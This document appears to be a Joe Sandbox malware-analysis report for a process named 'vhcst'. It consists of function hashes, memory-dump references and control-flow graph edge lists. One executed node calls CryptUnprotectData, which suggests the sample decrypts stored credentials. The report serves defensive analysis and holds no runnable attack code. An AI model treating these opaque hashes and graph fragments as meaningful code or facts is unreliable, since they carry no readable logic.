                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: 785797f9bbd9db95d0b880350d18f90fef60735cb4bfd2cf0696e8dd234f120a
                                                                                      • Instruction ID: 4bcef2b95188357308f9d03c32d7822277724ce919769d8ac2baeaa13bb5f9ee
                                                                                      • Opcode Fuzzy Hash: 785797f9bbd9db95d0b880350d18f90fef60735cb4bfd2cf0696e8dd234f120a
                                                                                      • Instruction Fuzzy Hash: A6512A57B0F2C51FE7627AAC68B50E92F909F8122D71D41F7D09C8B1EBE809594A83C6
                                                                                      Function 00007FFD99E106F0 Relevance: 7.6, Strings: 6, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: e13ea4bdff228dc0d00b9d2bef16884bd88dbcca22be80bf89d07f6a9ef5bc33
                                                                                      • Instruction ID: 98fdf9e54aae9ac32af11ae6cd02e4f8b7c1541b94c63a3d5a4ef35ac9274ff7
                                                                                      • Opcode Fuzzy Hash: e13ea4bdff228dc0d00b9d2bef16884bd88dbcca22be80bf89d07f6a9ef5bc33
                                                                                      • Instruction Fuzzy Hash: 57312C67B0F1841FD3527AB86CB50E92F90DF8122D75D41FBD0DC8B2A7E819994A8386
                                                                                      Function 00007FFD99E106F2 Relevance: 7.5, Strings: 6, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-1006404795
                                                                                      • Opcode ID: 8ad34706b6e0dd8ec773a0e9e808041c4eff078f468ac0895b8c0a5c3107fc34
                                                                                      • Instruction ID: 1197cefe0d9b1c14e04674fb8ae3f1bb42df2487c32a540f1c7e7298491a3e24
                                                                                      • Opcode Fuzzy Hash: 8ad34706b6e0dd8ec773a0e9e808041c4eff078f468ac0895b8c0a5c3107fc34
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 00007FFD99E106C8 Relevance: 6.3, Strings: 5, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-719319668
                                                                                      • Opcode ID: a905f8a2e9d073ebc38b488bd65ba55944b39e7f5f5a3042b7d5dd05247ce14c
                                                                                      • Instruction ID: 47179dfbacf6297dbac6f2cca5ab97a65077078d7737da5d861dce7075654162
                                                                                      • Opcode Fuzzy Hash: a905f8a2e9d073ebc38b488bd65ba55944b39e7f5f5a3042b7d5dd05247ce14c
                                                                                      • Instruction Fuzzy Hash: 39216B63F0F0554FE3127AB86CB60E82F908F8122D71D41F7D09C4B1A7DC18549A8786
                                                                                      Function 00007FFD99E10708 Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1786988532.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O_^ $O_^"$O_^0$O_^2$O_^4
                                                                                      • API String ID: 0-719319668
                                                                                      • Opcode ID: e08687361e845ae5bd5a8c76ca64c037521c7bd03d1a5095a026057b42f1b4cb
                                                                                      • Instruction ID: b72bb1a2cce33e210fdf65080638f5ef1885f54472cfe44384c2b5dae3a4807e
                                                                                      • Opcode Fuzzy Hash: e08687361e845ae5bd5a8c76ca64c037521c7bd03d1a5095a026057b42f1b4cb
                                                                                      • Instruction Fuzzy Hash: 57210873A0E1985FE3137EB86CA50E93F909F4122D71D41FBD09D8B2A7D818549A8786

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:100%
                                                                                      Total number of Nodes:4
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 36877 7ffd99fd270e 36878 7ffd99fd272a 36877->36878 36879 7ffd99fd2827 CryptUnprotectData 36878->36879 36880 7ffd99fd28a3 36879->36880

                                                                                      Executed Functions

                                                                                      Function 00007FFD99FD9C38 Relevance: 4.4, Strings: 3, Instructions: 616COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7ffd99fd9c38-7ffd99fdcbb6 2 7ffd99fdcbbc-7ffd99fdcbc8 0->2 3 7ffd99fdcc66-7ffd99fdcc99 0->3 4 7ffd99fdcbce-7ffd99fdcbd2 2->4 5 7ffd99fdcca0-7ffd99fdccdd call 7ffd99fdab70 2->5 3->5 8 7ffd99fdcbd8-7ffd99fdcbe5 call 7ffd99fd9c68 4->8 9 7ffd99fdcce4-7ffd99fdcd3d call 7ffd99fdab88 4->9 5->9 19 7ffd99fdcbe7-7ffd99fdcc02 call 7ffd99fda990 8->19 20 7ffd99fdcc1e-7ffd99fdcc23 8->20 37 7ffd99fdcd46-7ffd99fdcdc2 9->37 38 7ffd99fdcd3f-7ffd99fdcd45 9->38 30 7ffd99fdcc07-7ffd99fdcc1d call 7ffd99fd9c48 19->30 22 7ffd99fdcc25 20->22 23 7ffd99fdcc2f-7ffd99fdcc4e call 7ffd99fda990 20->23 22->23 31 7ffd99fdcc53-7ffd99fdcc64 23->31 31->30 46 7ffd99fdcdf6-7ffd99fdce12 37->46 47 7ffd99fdcdc4-7ffd99fdcdde 37->47 50 7ffd99fdce46-7ffd99fdce5d 46->50 51 7ffd99fdce14-7ffd99fdce2a 46->51 47->46 55 7ffd99fdce5e-7ffd99fdce62 50->55 51->55 59 7ffd99fdce2c-7ffd99fdce45 51->59 56 7ffd99fdce96-7ffd99fdcec9 55->56 57 7ffd99fdce64-7ffd99fdce95 55->57 66 7ffd99fdcecc-7ffd99fdcede 56->66 67 7ffd99fdcefe-7ffd99fdcf12 56->67 57->56 59->50 66->67 68 7ffd99fdcf46-7ffd99fdcf49 67->68 69 7ffd99fdcf14-7ffd99fdcf22 67->69 71 7ffd99fdcf4b-7ffd99fdcf55 68->71 72 7ffd99fdcfc0-7ffd99fdcfc9 68->72 74 7ffd99fdcf56-7ffd99fdcf5d 69->74 75 7ffd99fdcf24-7ffd99fdcf2a 69->75 71->74 82 7ffd99fdcfcc-7ffd99fdcfd1 72->82 83 7ffd99fdcffe-7ffd99fdd008 72->83 76 7ffd99fdcf5e-7ffd99fdcf62 74->76 75->76 77 7ffd99fdcf2c-7ffd99fdcf45 75->77 79 7ffd99fdcf96-7ffd99fdcf9d 76->79 80 7ffd99fdcf64-7ffd99fdcf6a 76->80 77->68 85 7ffd99fdcf9e-7ffd99fdcfbe 79->85 84 7ffd99fdcf6c-7ffd99fdcf95 80->84 80->85 87 7ffd99fdd047 82->87 89 7ffd99fdd00a-7ffd99fdd032 83->89 90 7ffd99fdd052-7ffd99fdd06a 83->90 84->79 85->72 92 7ffd99fdd049-7ffd99fdd04c 87->92 93 7ffd99fdd0a0-7ffd99fdd0cc call 7ffd99fda9c0 87->93 105 7ffd99fdd03a-7ffd99fdd045 89->105 106 7ffd99fdd034 89->106 101 7ffd99fdd0db-7ffd99fdd0de 90->101 109 7ffd99fdd06c-7ffd99fdd071 90->109 97 7ffd99fdd04e-7ffd99fdd050 92->97 98 7ffd99fdd0cd-7ffd99fdd0d7 92->98 93->98 97->90 98->101 107 7ffd99fdd100-7ffd99fdd14f call 7ffd99fdabe0 101->107 108 7ffd99fdd0e0-7ffd99fdd0e4 101->108 105->87 106->105 111 7ffd99fdd0e7-7ffd99fdd0e8 108->111 112 7ffd99fdd0f2-7ffd99fdd0f5 call 7ffd99fd9c40 109->112 113 7ffd99fdd073-7ffd99fdd08e 109->113 116 7ffd99fdd0ea-7ffd99fdd0f1 111->116 117 7ffd99fdd0f8-7ffd99fdd0ff 111->117 113->111 114 7ffd99fdd090-7ffd99fdd09e 113->114 114->93 116->112
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "u$X2_H$X2_H
                                                                                      • API String ID: 0-4150207192
                                                                                      • Opcode ID: f55926ed21882f32a99fc2d0041c77e3f870ee8473ce700171a2e4186ed199c1
                                                                                      • Instruction ID: 3927959b4fe35f9f4464e4fecbbb9236e47e3405e604a6048c5e4438508d51c5
                                                                                      • Opcode Fuzzy Hash: f55926ed21882f32a99fc2d0041c77e3f870ee8473ce700171a2e4186ed199c1
                                                                                      • Instruction Fuzzy Hash: 79026B22B0CA564BD7A5BF7C94242FAB7D0EF85228F08427BD18DC65D7DF196846C382
                                                                                      Function 00007FFD99FD12A5 Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 302 7ffd99fd12a5-7ffd99fd1384 320 7ffd99fd13b6-7ffd99fd1484 302->320 321 7ffd99fd1386-7ffd99fd13b5 302->321 339 7ffd99fd14b5-7ffd99fd14d9 320->339 340 7ffd99fd1486-7ffd99fd14b4 320->340 321->320 347 7ffd99fd150a-7ffd99fd1584 339->347 348 7ffd99fd14db-7ffd99fd14de 339->348 340->339 354 7ffd99fd15aa-7ffd99fd15f3 347->354 355 7ffd99fd1586-7ffd99fd158f 347->355 348->347 357 7ffd99fd1596-7ffd99fd1598 355->357 357->354 359 7ffd99fd159a-7ffd99fd15a9 357->359
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /3_I$03_I
                                                                                      • API String ID: 0-2645384635
                                                                                      • Opcode ID: a8c9c9ec9262837bdcb52aaa05392727941d3915b254b0e03fe4547694cbdb0e
                                                                                      • Instruction ID: 37999e8d2d945f2d6b6f533bc761ec65c05eb3b313f0054f379bc248d511d35b
                                                                                      • Opcode Fuzzy Hash: a8c9c9ec9262837bdcb52aaa05392727941d3915b254b0e03fe4547694cbdb0e
                                                                                      • Instruction Fuzzy Hash: 27B15B93B0EBC20FE365CEA858A5165FB80FF5761871943F6D08C471ABEA15B845C382
                                                                                      Function 00007FFD99E2BA28 Relevance: 2.6, Strings: 1, Instructions: 1347COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 388 7ffd99e2ba28-7ffd99e69d8e call 7ffd99e65b60 392 7ffd99e69d90-7ffd99e69daa 388->392 393 7ffd99e69dab-7ffd99e69dba call 7ffd99e59fe8 388->393 392->393 396 7ffd99e69dbf-7ffd99e69dca 393->396 397 7ffd99e69dcc-7ffd99e69de8 396->397 398 7ffd99e69dea-7ffd99e69e20 call 7ffd99e59ff0 396->398 397->398 403 7ffd99e6aa6d-7ffd99e6aa72 398->403 404 7ffd99e69e26-7ffd99e69e35 398->404 405 7ffd99e69e40-7ffd99e69e6c 403->405 406 7ffd99e6aa78-7ffd99e6aa85 403->406 407 7ffd99e6aa90-7ffd99e6aa98 404->407 408 7ffd99e69e3b 404->408 415 7ffd99e69e6e-7ffd99e69e71 405->415 416 7ffd99e69ebb-7ffd99e69ebe 405->416 406->405 409 7ffd99e6aa8b 406->409 410 7ffd99e6aa9e-7ffd99e6aad1 407->410 411 7ffd99e6afd9-7ffd99e6afed 407->411 408->411 409->411 413 7ffd99e6afee-7ffd99e6b038 410->413 414 7ffd99e6aad7-7ffd99e6aafa 410->414 449 7ffd99e6b083 413->449 450 7ffd99e6b03a-7ffd99e6b049 call 7ffd99e59ff0 413->450 414->411 420 7ffd99e69e73-7ffd99e69e74 415->420 421 7ffd99e69e76-7ffd99e69e7e 415->421 417 7ffd99e69ec4-7ffd99e69ec8 416->417 418 7ffd99e6aa07-7ffd99e6aa13 416->418 422 7ffd99e69ef0-7ffd99e69f15 417->422 423 7ffd99e69eca-7ffd99e69ed1 417->423 424 7ffd99e6aa4f-7ffd99e6aa56 418->424 425 7ffd99e6aa15-7ffd99e6aa1c 418->425 420->421 427 7ffd99e69e94-7ffd99e69eb6 call 7ffd99e2b280 421->427 428 7ffd99e69e80-7ffd99e69e8f call 7ffd99e2ba38 421->428 434 7ffd99e6a6bd-7ffd99e6a6e7 422->434 435 7ffd99e69f1b-7ffd99e69f6e 422->435 423->422 431 7ffd99e69ed3-7ffd99e69eea 423->431 437 7ffd99e6aa58-7ffd99e6aa66 call 7ffd99e59fe0 424->437 432 7ffd99e6aa1e-7ffd99e6aa35 425->432 433 7ffd99e6aa46-7ffd99e6aa4d 425->433 427->418 428->427 431->407 431->422 432->437 439 7ffd99e6aa37-7ffd99e6aa44 call 7ffd99e59fe0 432->439 433->437 434->413 440 7ffd99e6a6ed-7ffd99e6a729 434->440 447 7ffd99e69f70-7ffd99e69f99 call 7ffd99e5a138 435->447 448 7ffd99e69fc6-7ffd99e69ff0 435->448 437->403 439->407 455 7ffd99e6a72b-7ffd99e6a744 440->455 456 7ffd99e6a746-7ffd99e6a779 440->456 447->448 469 7ffd99e69f9b-7ffd99e69fbf 447->469 448->413 451 7ffd99e69ff6-7ffd99e6a02f 448->451 452 7ffd99e6b0c5-7ffd99e6b0e6 449->452 453 7ffd99e6b085-7ffd99e6b087 449->453 464 7ffd99e6b055-7ffd99e6b05a 450->464 465 7ffd99e6a031-7ffd99e6a04a 451->465 466 7ffd99e6a04c-7ffd99e6a089 451->466 453->452 462 7ffd99e6a780-7ffd99e6a78b 455->462 456->462 467 7ffd99e6a78d-7ffd99e6a790 462->467 468 7ffd99e6a795-7ffd99e6a7b0 462->468 471 7ffd99e6b04b-7ffd99e6b04e 464->471 472 7ffd99e6b05c-7ffd99e6b069 464->472 473 7ffd99e6a090-7ffd99e6a09b 465->473 466->473 474 7ffd99e6a81c-7ffd99e6a82e 467->474 476 7ffd99e6a7b2-7ffd99e6a7e2 call 7ffd99e508c0 468->476 477 7ffd99e6a82f-7ffd99e6a839 468->477 469->448 471->464 479 7ffd99e6b050 call 7ffd99e59fe0 471->479 472->471 478 7ffd99e6b06b-7ffd99e6b074 472->478 480 7ffd99e6a09d-7ffd99e6a0a5 473->480 481 7ffd99e6a0aa-7ffd99e6a0fc call 7ffd99e508c0 473->481 474->477 494 7ffd99e6a7e4-7ffd99e6a7e9 476->494 495 7ffd99e6a7fa-7ffd99e6a812 call 7ffd99e53440 476->495 489 7ffd99e6a83c-7ffd99e6a883 477->489 490 7ffd99e6a885-7ffd99e6a88c 477->490 479->464 483 7ffd99e6a136-7ffd99e6a27e call 7ffd99e5a138 call 7ffd99e5bab0 480->483 501 7ffd99e6a114-7ffd99e6a12c call 7ffd99e53440 481->501 502 7ffd99e6a0fe-7ffd99e6a103 481->502 548 7ffd99e6a4e4-7ffd99e6a658 call 7ffd99e5a138 * 2 call 7ffd99e5bab0 483->548 549 7ffd99e6a284-7ffd99e6a28b 483->549 489->490 492 7ffd99e6a8ad-7ffd99e6a8df 490->492 493 7ffd99e6a88e-7ffd99e6a896 490->493 504 7ffd99e6a8e1-7ffd99e6a952 call 7ffd99e5bab0 492->504 493->504 505 7ffd99e6a898-7ffd99e6a8ab 493->505 494->495 499 7ffd99e6a7eb-7ffd99e6a7f8 494->499 495->474 499->495 506 7ffd99e6a814-7ffd99e6a815 499->506 501->483 502->501 509 7ffd99e6a105-7ffd99e6a112 502->509 527 7ffd99e6a994 504->527 528 7ffd99e6a954-7ffd99e6a992 call 7ffd99e612d0 * 2 504->528 505->492 506->474 509->501 513 7ffd99e6a12e-7ffd99e6a12f 509->513 513->483 532 7ffd99e6a996-7ffd99e6a997 527->532 528->532 534 7ffd99e6a999-7ffd99e6a9a4 532->534 537 7ffd99e6a9e2-7ffd99e6aa05 call 7ffd99e2b280 534->537 538 7ffd99e6a9a6-7ffd99e6a9ad 534->538 537->418 538->411 539 7ffd99e6a9b3-7ffd99e6a9b7 538->539 539->411 542 7ffd99e6a9bd-7ffd99e6a9d7 539->542 542->407 545 7ffd99e6a9dd 542->545 545->411 594 7ffd99e6a69d 548->594 595 7ffd99e6a65a-7ffd99e6a69b call 7ffd99e612d0 * 2 548->595 549->548 550 7ffd99e6a291-7ffd99e6a2aa 549->550 550->548 552 7ffd99e6a2b0-7ffd99e6a2e3 550->552 552->413 554 7ffd99e6a2e9-7ffd99e6a2fb 552->554 556 7ffd99e6a2fd-7ffd99e6a306 554->556 557 7ffd99e6a308-7ffd99e6a328 554->557 559 7ffd99e6a32f-7ffd99e6a33a 556->559 557->559 561 7ffd99e6a344-7ffd99e6a391 call 7ffd99e508c0 559->561 562 7ffd99e6a33c-7ffd99e6a33f 559->562 571 7ffd99e6a393-7ffd99e6a398 561->571 572 7ffd99e6a3a9-7ffd99e6a3c1 call 7ffd99e53440 561->572 565 7ffd99e6a3cb-7ffd99e6a4df call 7ffd99e5a138 * 2 562->565 598 7ffd99e6a6b0-7ffd99e6a6b8 565->598 571->572 575 7ffd99e6a39a-7ffd99e6a3a7 571->575 572->565 575->572 577 7ffd99e6a3c3-7ffd99e6a3c4 575->577 577->565 597 7ffd99e6a69f-7ffd99e6a6a8 594->597 595->597 597->598 598->534
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (
                                                                                      • API String ID: 0-3887548279
                                                                                      • Opcode ID: 52a7a55a9850a71596518d609f94b3bac00351972dc1516df56f83c96eb6fcb3
                                                                                      • Instruction ID: aa41fdb39ed655fa99cc8d3b16cb4b905b45ac8dde8b881ff83df9f7424fea7b
                                                                                      • Opcode Fuzzy Hash: 52a7a55a9850a71596518d609f94b3bac00351972dc1516df56f83c96eb6fcb3
                                                                                      • Instruction Fuzzy Hash: 9AA27070A1DA498FDBB9DF18C495BA6B3E1FFA8304F10456DD08EC7296DE35A841CB42
                                                                                      Function 00007FFD99E2B720 Relevance: 2.0, Strings: 1, Instructions: 782COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1222 7ffd99e2b720 1223 7ffd99e2b721-7ffd99e2b737 1222->1223 1223->1223 1224 7ffd99e2b739-7ffd99e2b746 1223->1224 1226 7ffd99e2b749 1224->1226 1227 7ffd99e2b6d8-7ffd99e2b706 1226->1227 1228 7ffd99e2b74b-7ffd99e2b75f 1226->1228 1234 7ffd99e2b709-7ffd99e2b71f 1227->1234 1228->1226 1233 7ffd99e2b761-7ffd99e2b76e 1228->1233 1235 7ffd99e2b771-7ffd99e2b787 1233->1235 1234->1222 1239 7ffd99e2b789-7ffd99e5f885 1235->1239 1244 7ffd99e5f8cf call 7ffd99e2fea8 1239->1244 1245 7ffd99e5f887-7ffd99e5f8b1 1239->1245 1248 7ffd99e5f8d4-7ffd99e5f8d6 1244->1248 1246 7ffd99e5f8b3-7ffd99e5f8cd 1245->1246 1246->1244 1249 7ffd99e5f8eb-7ffd99e5f8f2 1248->1249 1250 7ffd99e5f8d8-7ffd99e5f8e6 call 7ffd99e2a1f0 1248->1250 1252 7ffd99e5fee2-7ffd99e5ff28 call 7ffd99e2b110 1249->1252 1253 7ffd99e5f8f8-7ffd99e5f91b call 7ffd99e2b818 1249->1253 1250->1249 1257 7ffd99e5f920-7ffd99e5f922 1253->1257 1258 7ffd99e5f924-7ffd99e5f934 call 7ffd99e2ba88 1257->1258 1259 7ffd99e5f969-7ffd99e5f97e 1257->1259 1263 7ffd99e5f939-7ffd99e5f968 call 7ffd99e2ba88 1258->1263 1259->1252 1262 7ffd99e5f984-7ffd99e5f9ad call 7ffd99e5a080 call 7ffd99e5bfc0 1259->1262 1270 7ffd99e5f9fe 1262->1270 1271 7ffd99e5f9af-7ffd99e5f9c4 call 7ffd99e5c300 1262->1271 1272 7ffd99e5fa00-7ffd99e5fa05 1270->1272 1278 7ffd99e5f9c6-7ffd99e5f9d3 call 7ffd99e5c2b0 1271->1278 1279 7ffd99e5f9d5 1271->1279 1274 7ffd99e5fb73-7ffd99e5fb75 1272->1274 1275 7ffd99e5fa0b-7ffd99e5fa0f 1272->1275 1280 7ffd99e5fd9a-7ffd99e5fdb0 1274->1280 1281 7ffd99e5fb7b-7ffd99e5fb87 1274->1281 1275->1274 1277 7ffd99e5fa15-7ffd99e5fa60 call 7ffd99e5a0c8 call 7ffd99e5b540 1275->1277 1330 7ffd99e5fa62-7ffd99e5fa68 1277->1330 1331 7ffd99e5fadc-7ffd99e5fade 1277->1331 1285 7ffd99e5f9da-7ffd99e5f9dc 1278->1285 1279->1285 1290 7ffd99e5fe8b-7ffd99e5fe97 1280->1290 1291 7ffd99e5fdb6-7ffd99e5fdc1 call 7ffd99e5bfc0 1280->1291 1281->1280 1284 7ffd99e5fb8d-7ffd99e5fbab call 7ffd99e2b870 1281->1284 1300 7ffd99e5fbad-7ffd99e5fbbb call 7ffd99e2b7a8 1284->1300 1301 7ffd99e5fbc0-7ffd99e5fbc4 1284->1301 1285->1270 1289 7ffd99e5f9de-7ffd99e5f9e8 call 7ffd99e5c300 1285->1289 1308 7ffd99e5f9ea-7ffd99e5f9f5 call 7ffd99e5c2b0 1289->1308 1309 7ffd99e5f9f7 1289->1309 1292 7ffd99e5fed4-7ffd99e5fedb 1290->1292 1293 7ffd99e5fe99-7ffd99e5fed2 call 7ffd99e5a118 call 7ffd99e2b7d8 1290->1293 1291->1290 1312 7ffd99e5fdc7-7ffd99e5fe71 call 7ffd99e10388 1291->1312 1292->1252 1302 7ffd99e5fedd call 7ffd99e2b7a8 1292->1302 1293->1252 1300->1252 1310 7ffd99e5fc4e-7ffd99e5fc52 1301->1310 1311 7ffd99e5fbca-7ffd99e5fbd7 call 7ffd99e2fe78 1301->1311 1302->1252 1321 7ffd99e5f9fc 1308->1321 1309->1321 1319 7ffd99e5fc54-7ffd99e5fc6b call 7ffd99e5a0c8 call 7ffd99e5b568 1310->1319 1320 7ffd99e5fc96-7ffd99e5fc97 1310->1320 1332 7ffd99e5fbd9-7ffd99e5fc10 call 7ffd99e5a0c8 call 7ffd99e59fa0 1311->1332 1333 7ffd99e5fc15-7ffd99e5fc4c call 7ffd99e5a0c8 call 7ffd99e59fa0 1311->1333 1312->1252 1381 7ffd99e5fe73-7ffd99e5fe89 1312->1381 1348 7ffd99e5fc7e-7ffd99e5fc87 1319->1348 1349 7ffd99e5fc6d-7ffd99e5fc7c 1319->1349 1323 7ffd99e5fc99-7ffd99e5fd61 call 7ffd99e10388 1320->1323 1321->1272 1323->1280 1338 7ffd99e5fa6a-7ffd99e5fa6f 1330->1338 1339 7ffd99e5fae9-7ffd99e5faf0 1330->1339 1336 7ffd99e5fae0-7ffd99e5fae8 1331->1336 1332->1320 1333->1320 1336->1339 1338->1336 1345 7ffd99e5fa71-7ffd99e5fa76 1338->1345 1351 7ffd99e5faf7-7ffd99e5fb52 call 7ffd99e10388 1339->1351 1345->1351 1354 7ffd99e5fa78-7ffd99e5fa9b 1345->1354 1348->1323 1356 7ffd99e5fc89-7ffd99e5fc94 1348->1356 1349->1348 1351->1252 1382 7ffd99e5fb58-7ffd99e5fb6e 1351->1382 1354->1331 1356->1320 1381->1252 1382->1252
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: A^L
                                                                                      • API String ID: 0-22387680
                                                                                      • Opcode ID: 6e2d07a3e8ae91f64465c25ad99b5767b367871e6cb0bd91fe5c3255d050ac9c
                                                                                      • Instruction ID: 21604c473eb923c444e6d18150c13f907bbea900a266517009eb8813bfb4ad64
                                                                                      • Opcode Fuzzy Hash: 6e2d07a3e8ae91f64465c25ad99b5767b367871e6cb0bd91fe5c3255d050ac9c
                                                                                      • Instruction Fuzzy Hash: BB323B21B1DA494BEB68EEA894B66B973D1EF98318F04457DD04EC71D7DD29B8028383
                                                                                      Function 00007FFD99E21158 Relevance: 1.9, Strings: 1, Instructions: 617COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1389 7ffd99e21158-7ffd99e2283a 1391 7ffd99e22896-7ffd99e2289a 1389->1391 1392 7ffd99e2283c-7ffd99e2284c 1389->1392 1395 7ffd99e228de-7ffd99e228e2 1391->1395 1396 7ffd99e2289c-7ffd99e228c8 call 7ffd99e10418 1391->1396 1393 7ffd99e2284e-7ffd99e22851 1392->1393 1394 7ffd99e22856-7ffd99e22890 1392->1394 1397 7ffd99e22d21-7ffd99e22d63 1393->1397 1394->1391 1408 7ffd99e22cef-7ffd99e22cf7 1394->1408 1399 7ffd99e228e4-7ffd99e22916 call 7ffd99e1bb10 1395->1399 1400 7ffd99e22917-7ffd99e2291b 1395->1400 1409 7ffd99e228cd-7ffd99e228dd 1396->1409 1399->1400 1403 7ffd99e2291d-7ffd99e22942 1400->1403 1404 7ffd99e2298a-7ffd99e229ab 1400->1404 1410 7ffd99e229b2-7ffd99e229c3 1403->1410 1419 7ffd99e22944-7ffd99e22984 1403->1419 1404->1410 1416 7ffd99e22d1e-7ffd99e22d1f 1408->1416 1417 7ffd99e22cf9-7ffd99e22d1c 1408->1417 1409->1395 1412 7ffd99e229c5 1410->1412 1413 7ffd99e229ca-7ffd99e22a32 call 7ffd99e22d64 call 7ffd99e22dbb call 7ffd99e1f408 1410->1413 1412->1413 1431 7ffd99e22a34-7ffd99e22a75 call 7ffd99e1f4f8 1413->1431 1432 7ffd99e22a89-7ffd99e22a98 1413->1432 1416->1397 1417->1397 1419->1404 1445 7ffd99e22ad2-7ffd99e22b5f call 7ffd99e1f570 1431->1445 1449 7ffd99e22a77-7ffd99e22a85 1431->1449 1433 7ffd99e22ab2-7ffd99e22acc 1432->1433 1434 7ffd99e22a9a 1432->1434 1433->1445 1436 7ffd99e22a9b-7ffd99e22aab 1434->1436 1439 7ffd99e22ab1 1436->1439 1440 7ffd99e22b73-7ffd99e22b95 1436->1440 1439->1433 1443 7ffd99e22c5f-7ffd99e22cb3 1440->1443 1444 7ffd99e22b9b-7ffd99e22bb6 1440->1444 1460 7ffd99e22cb8-7ffd99e22cee call 7ffd99e11e40 call 7ffd99e117e0 call 7ffd99e211c8 1443->1460 1454 7ffd99e22bbc-7ffd99e22c5b call 7ffd99e1f570 1444->1454 1445->1454 1478 7ffd99e22b61-7ffd99e22b72 1445->1478 1449->1436 1453 7ffd99e22a87-7ffd99e22a88 1449->1453 1453->1432 1454->1443 1460->1408 1478->1440
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Sd
                                                                                      • API String ID: 0-1064845130
                                                                                      • Opcode ID: fde3ecf2aaaad768756710c4ac4fcf60d521b83d819ce0ddc2c4cd7befffcdb5
